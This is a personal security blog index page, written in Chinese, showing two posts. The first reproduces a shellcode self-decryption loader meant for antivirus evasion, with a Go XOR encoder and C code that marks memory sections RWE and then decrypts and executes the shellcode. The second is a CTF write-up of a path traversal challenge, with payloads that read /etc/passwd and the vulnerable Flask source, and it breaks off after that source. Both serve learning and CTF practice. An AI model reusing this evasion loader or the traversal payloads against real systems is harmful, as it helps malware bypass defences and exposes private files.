-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
1518 lines (978 loc) · 172 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<script id="hexo-configurations">
var NexT = window.NexT || {};
var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
</script>
<meta name="description" content="So1Lupus的个人博客">
<meta property="og:type" content="website">
<meta property="og:title" content="So1Lupus">
<meta property="og:url" content="http://example.com/index.html">
<meta property="og:site_name" content="So1Lupus">
<meta property="og:description" content="So1Lupus的个人博客">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="So1Lupus">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="http://example.com/">
<script id="page-configurations">
// https://hexo.io/docs/variables.html
CONFIG.page = {
sidebar: "",
isHome : true,
isPost : false,
lang : 'zh-CN'
};
</script>
<title>So1Lupus</title>
<noscript>
<style>
.use-motion .brand,
.use-motion .menu-item,
.sidebar-inner,
.use-motion .post-block,
.use-motion .pagination,
.use-motion .comments,
.use-motion .post-header,
.use-motion .post-body,
.use-motion .collection-header { opacity: initial; }
.use-motion .site-title,
.use-motion .site-subtitle {
opacity: initial;
top: initial;
}
.use-motion .logo-line-before i { left: initial; }
.use-motion .logo-line-after i { right: initial; }
</style>
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage">
<div class="container use-motion">
<div class="headband"></div>
<header class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="切换导航栏">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<h1 class="site-title">So1Lupus</h1>
<span class="logo-line-after"><i></i></span>
</a>
<p class="site-subtitle" itemprop="description">So1Lupus</p>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger">
<i class="fa fa-search fa-fw fa-lg"></i>
</div>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="main-menu menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>
</li>
<li class="menu-item menu-item-search">
<a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
</a>
</li>
</ul>
</nav>
<div class="search-pop-overlay">
<div class="popup search-popup">
<div class="search-header">
<span class="search-icon">
<i class="fa fa-search"></i>
</span>
<div class="search-input-container">
<input autocomplete="off" autocapitalize="off"
placeholder="搜索..." spellcheck="false"
type="search" class="search-input">
</div>
<span class="popup-btn-close">
<i class="fa fa-times-circle"></i>
</span>
</div>
<div id="search-result">
<div id="no-result">
<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
</div>
</div>
</div>
</div>
</div>
</header>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
<span>0%</span>
</div>
<main class="main">
<div class="main-inner">
<div class="content-wrap">
<div class="content index posts-expand">
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/4cb58a28.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/4cb58a28.html" class="post-title-link" itemprop="url">计算内存地址实现shellcode自解密</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2024-09-28 20:25:25 / 修改时间:20:28:22" itemprop="dateCreated datePublished" datetime="2024-09-28T20:25:25+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<blockquote>
<p> 学习文章出处:<a target="_blank" rel="noopener" href="https://forum.butian.net/share/2669">https://forum.butian.net/share/2669</a></p>
<p> 主要学习了这篇文章的内容并进行复现总结</p>
</blockquote>
<h2 id="一、前言"><a href="#一、前言" class="headerlink" title="一、前言"></a>一、前言</h2><p> 这篇文章主要就是通过在加载正式的shellcode之前先通过call调用自己写的解密函数对shellcode进行解密,随后进行调用,由于是在内存加载过程中进行解密,并且没有显式调用解密函数,所以从动态免杀角度还是有一定效果的,并且由于shellcode是提前进行加密的,所以从静态免杀角度也有一定的效用。</p>
<h2 id="二、复现"><a href="#二、复现" class="headerlink" title="二、复现"></a>二、复现</h2><p> 本人复现过程中主要使用异或加密进行简单的shellcode加密,然后使用golang进行加密</p>
<figure class="highlight golang"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"> <span class="string">"fmt"</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> (</span><br><span class="line"> buf = []<span class="type">byte</span>(<span class="string">""</span>) <span class="comment">//shellcode</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">encode</span><span class="params">(original []<span class="type">byte</span>)</span></span> []<span class="type">byte</span> {</span><br><span class="line"> cipher := <span class="built_in">make</span>([]<span class="type">byte</span>, <span class="built_in">len</span>(original))</span><br><span class="line"> <span class="keyword">for</span> i := <span class="number">0</span>; i < <span class="built_in">len</span>(buf); i++ {</span><br><span class="line"> cipher[i] = original[i] ^ <span class="number">3</span> <span class="comment">//异或加密</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> cipher</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line"> cipher := encode(buf)</span><br><span class="line"> result := <span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> _, b := <span class="keyword">range</span> cipher {</span><br><span class="line"> result += fmt.Sprintf(<span class="string">"\\x%02x"</span>, b)</span><br><span class="line"> }</span><br><span class="line"> fmt.Println(<span class="string">"Shellcode length:"</span>, <span class="built_in">len</span>(cipher))</span><br><span class="line"> fmt.Println(<span class="string">"Hex string in \\x format:"</span>, result)</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p> 然后由于是初学者,在加载器编写的过程中遇到了一些问题,在这里一起进行记录:</p>
<ol>
<li>关于访问空间冲突,由于在加载shellcode之后要对.data段里的shellcode进行解密操作,所以需要有读写权限,所以我们需要在开头加上一下内容</li>
</ol>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">pragma</span> comment(linker, <span class="string">"/section:.data,RWE"</span>)</span></span><br></pre></td></tr></table></figure>
<ol start="2">
<li>vs studio 需要关闭所有优化,并且链接器需要关闭引用优化,从而保留未使用的decrypt函数,这样我们才能通过<code>e8 call</code> 调用进行解密。</li>
<li>需要关闭随即地址生成,然后固定基址</li>
</ol>
<p>解决了上述问题后,主要关键就是获取偏移地址,因为e8指令调用是相对偏移地址,然后计算公式是<code>offset = desc-src-5</code>(个人实践结论) ,所以我们只需要在进行函数加载进入内存的时候下一个断点,然后进入汇编来寻找对应的地址。</p>
<img src="/undefined/4cb58a28/image-20240924130357720.png" class="">
<p>这个是decrypt函数的地址,也就是我们跳转的目的地(desc)</p>
<img src="/undefined/4cb58a28/image-20240924130429741.png" class="">
<p>这是我们跳转的出发点也就是src,所以偏移地址就等于0xffffc01b,当然这个偏移地址不是固定的,每次修改代码都有可能导致地址的变换,需要重新计算</p>
<img src="/undefined/4cb58a28/image-20240924130500456.png" class="">
<p>这样之后,我们便能够成功解密shellcode并进行上线。</p>
<p>代码如下:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">#include <stdio.h></span><br><span class="line">#include <windows.h></span><br><span class="line">#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")</span><br><span class="line">#pragma comment(linker, "/section:.data,RWE")</span><br><span class="line">#pragma comment(linker, "/section:.text,RWE")</span><br><span class="line">unsigned char shellcode[] = "\xe8\x00\x00\x00\x00"; //前五位为e8 call 指令 ,往后为加密的shellcode</span><br><span class="line">typedef void (*CODE)();</span><br><span class="line"></span><br><span class="line">PVOID p = NULL;</span><br><span class="line"></span><br><span class="line">void decrypt()</span><br><span class="line">{</span><br><span class="line"></span><br><span class="line"> for (int i = 5; i < sizeof(shellcode); i++)</span><br><span class="line"> {</span><br><span class="line"> *(char*)&shellcode[i] = *(char*)&shellcode[i] ^ 3;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">DWORD WINAPI ThreadProc(</span><br><span class="line"> LPVOID lpParameter // thread data</span><br><span class="line">)</span><br><span class="line">{</span><br><span class="line"> // if ((p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)</span><br><span class="line"> // {</span><br><span class="line"> // // MessageBoxW(NULL, L"VirtualAlloc Failed!!!", L"Prompt", MB_OK);</span><br><span class="line"> // return 1;</span><br><span class="line"> // }</span><br><span class="line"> // PDWORD tmp = 0;</span><br><span class="line"> // VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, tmp);</span><br><span class="line"> // ����shellcode</span><br><span class="line"> // if (!(memcpy(p, shellcode, sizeof(shellcode))))</span><br><span class="line"> // {</span><br><span class="line"> // // MessageBoxW(NULL, L"WriteMemory Failed!!!", L"Prompt", MB_OK);</span><br><span class="line"> // return 1;</span><br><span class="line"> // }</span><br><span class="line"></span><br><span class="line"> PVOID p = shellcode;</span><br><span class="line"> CODE code = (CODE)p;</span><br><span class="line"> code();</span><br><span class="line"></span><br><span class="line"> return 0;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line">{</span><br><span class="line"> // INT cores = checkCPUCores();</span><br><span class="line"> // if (cores <= 4)</span><br><span class="line"> //{</span><br><span class="line"> // ����һ���µ��߳�</span><br><span class="line"> ////decrypt();</span><br><span class="line"> HANDLE hThread = ::CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);</span><br><span class="line"> WaitForSingleObject(hThread, INFINITE);</span><br><span class="line"> //}</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="三、总结"><a href="#三、总结" class="headerlink" title="三、总结"></a>三、总结</h2><p> 这只是粗略的自解密学习记录,打算后续结合自增段+段加密进行进一步的加强。</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/59bc99f5.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/59bc99f5.html" class="post-title-link" itemprop="url">2023国赛CTF初赛WEB-READIT复现</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2024-09-28 20:20:25 / 修改时间:20:27:43" itemprop="dateCreated datePublished" datetime="2024-09-28T20:20:25+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<blockquote>
<p>在本地搭建环境进行的复现,所以某些地方会与做题时有些许不同,不过并不影响整体做题思路</p>
</blockquote>
<h2 id="0x01-信息搜集"><a href="#0x01-信息搜集" class="headerlink" title="0x01 信息搜集"></a>0x01 信息搜集</h2><p>首先登录界面后,就是一个很简单的web页面。</p>
<img src="/undefined/59bc99f5/image-20230530181449351.png" class="">
<p>点击提交后,我们会发现我们跳转到了另一个页面并且url上多了几个参数。</p>
<img src="/undefined/59bc99f5/image-20230530181537084.png" class="">
<p>此时我们可以猜想,这个book参数是否存在一个目录穿越导致任意文件读的漏洞,于是利用如下payload进行一个初步的验证</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">../../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>
<p>但是发现并不能成功读取文件,那难道是我们的思路有问题吗?</p>
<img src="/undefined/59bc99f5/image-20230530181712589.png" class="">
<p>此时,我们回过头来再想想,这个实现的逻辑是什么,而后端的代码是如何实现这个逻辑的。很显然,这里实现将书籍显示出来的功能肯定要涉及到一个文件读取的逻辑或者文件包含的逻辑,那么肯定有一处参数是涉及这个文件读取的,然后我们回过头来仔细看,这里的选择的书籍名称和book一样(题目环境貌似是相近,没有完全一样),我们有理由肯定此处存在文件读取的功能,那么为什么我们做不到任意文件读呢?有一种可能是存在waf,它将我们的某些字符过滤了,那这里毕竟是ctf比赛,不是真实环境,既然题目的名字也叫readit,那说明这个肯定还是存在一个文件读取的漏洞的。所以把常见的绕过payload都试一试咯,然后如下payload成功读取了文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.../.../.../.../.../.../.../etc/passwd</span><br></pre></td></tr></table></figure>
<img src="/undefined/59bc99f5/image-20230530182339485.png" class="">
<p>既然如此我们便可以去去读**/proc/self/cmdline**来看下当下执行的是什么命令</p>
<img src="/undefined/59bc99f5/image-20230530182803158.png" class="">
<p>然后发现用gunicorn起了个python服务,所以尝试去读文件源码**/app/server.py**</p>
<img src="/undefined/59bc99f5/image-20230530183028724.png" class="">
<p>源码如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> math</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, session, render_template, send_file</span><br><span class="line"><span class="keyword">from</span> datetime <span class="keyword">import</span> datetime</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = hashlib.md5(os.urandom(<span class="number">32</span>)).hexdigest()</span><br><span class="line">key = hashlib.md5(<span class="built_in">str</span>(time.time_ns()).encode()).hexdigest()</span><br><span class="line">books = os.listdir(<span class="string">'./books'</span>)</span><br><span class="line">books.sort(reverse=<span class="literal">True</span>)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"> <span class="keyword">if</span> session:</span><br><span class="line"> book = session[<span class="string">'book'</span>]</span><br><span class="line"> page = session[<span class="string">'page'</span>]</span><br><span class="line"> page_size = session[<span class="string">'page_size'</span>]</span><br><span class="line"> total_pages = session[<span class="string">'total_pages'</span>]</span><br><span class="line"> filepath = session[<span class="string">'filepath'</span>]</span><br><span class="line"> words = read_file_page(filepath, page, page_size)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, books=books, words=words)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, books=books )</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/books'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">book_page</span>():</span><br><span class="line"> <span class="keyword">if</span> request.args.get(<span class="string">'book'</span>):</span><br><span class="line"> book = request.args.get(<span class="string">'book'</span>)</span><br><span class="line"> <span class="keyword">elif</span> session:</span><br><span class="line"> book = session.get(<span class="string">'book'</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, books=books, message=<span class="string">'I need book'</span>)</span><br><span class="line"> book=book.replace(<span class="string">'..'</span>,<span class="string">'.'</span>)</span><br><span class="line"> filepath = <span class="string">'./books/'</span> + book</span><br><span class="line"> <span class="keyword">if</span> request.args.get(<span class="string">'page_size'</span>):</span><br><span class="line"> page_size = <span class="built_in">int</span>(request.args.get(<span class="string">'page_size'</span>))</span><br><span class="line"> <span class="keyword">elif</span> session:</span><br><span class="line"> page_size = <span class="built_in">int</span>(session.get(<span class="string">'page_size'</span>))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> page_size = <span class="number">3000</span></span><br><span class="line"> total_pages = math.ceil(os.path.getsize(filepath) / page_size)</span><br><span class="line"> <span class="keyword">if</span> request.args.get(<span class="string">'page'</span>):</span><br><span class="line"> page = <span class="built_in">int</span>(request.args.get(<span class="string">'page'</span>))</span><br><span class="line"> <span class="keyword">elif</span> session:</span><br><span class="line"> page = <span class="built_in">int</span>(session.get(<span class="string">'page'</span>))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> page = <span class="number">1</span></span><br><span class="line"> words = read_file_page(filepath, page, page_size)</span><br><span class="line"> prev_page = page - <span class="number">1</span> <span class="keyword">if</span> page > <span class="number">1</span> <span class="keyword">else</span> <span class="literal">None</span></span><br><span class="line"> next_page = page + <span class="number">1</span> <span class="keyword">if</span> page < total_pages <span class="keyword">else</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"> session[<span class="string">'book'</span>] = book</span><br><span class="line"> session[<span class="string">'page'</span>] = page</span><br><span class="line"> session[<span class="string">'page_size'</span>] = page_size</span><br><span class="line"> session[<span class="string">'total_pages'</span>] = total_pages</span><br><span class="line"> session[<span class="string">'prev_page'</span>] = prev_page</span><br><span class="line"> session[<span class="string">'next_page'</span>] = next_page</span><br><span class="line"> session[<span class="string">'filepath'</span>] = filepath</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, books=books, words=words )</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/flag'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">flag</span>():</span><br><span class="line"> <span class="keyword">if</span> hashlib.md5(session.get(<span class="string">'key'</span>).encode()).hexdigest() == key:</span><br><span class="line"> <span class="keyword">return</span> os.popen(<span class="string">'/readflag'</span>).read()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"no no no"</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">read_file_page</span>(<span class="params">filename, page_number, page_size</span>):</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>):</span><br><span class="line"> size=page_size + j</span><br><span class="line"> offset = (page_number - <span class="number">1</span>) * page_size+i</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">'rb'</span>) <span class="keyword">as</span> file:</span><br><span class="line"> file.seek(offset)</span><br><span class="line"> words = file.read(size)</span><br><span class="line"> <span class="keyword">return</span> words.decode().split(<span class="string">'\n'</span>)</span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> <span class="comment">#if error again</span></span><br><span class="line"> offset = (page_number - <span class="number">1</span>) * page_size</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">'rb'</span>) <span class="keyword">as</span> file:</span><br><span class="line"> file.seek(offset)</span><br><span class="line"> words = file.read(page_size)</span><br><span class="line"> <span class="keyword">return</span> words.split(<span class="string">b'\n'</span>)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="string">'8000'</span>)</span><br></pre></td></tr></table></figure>
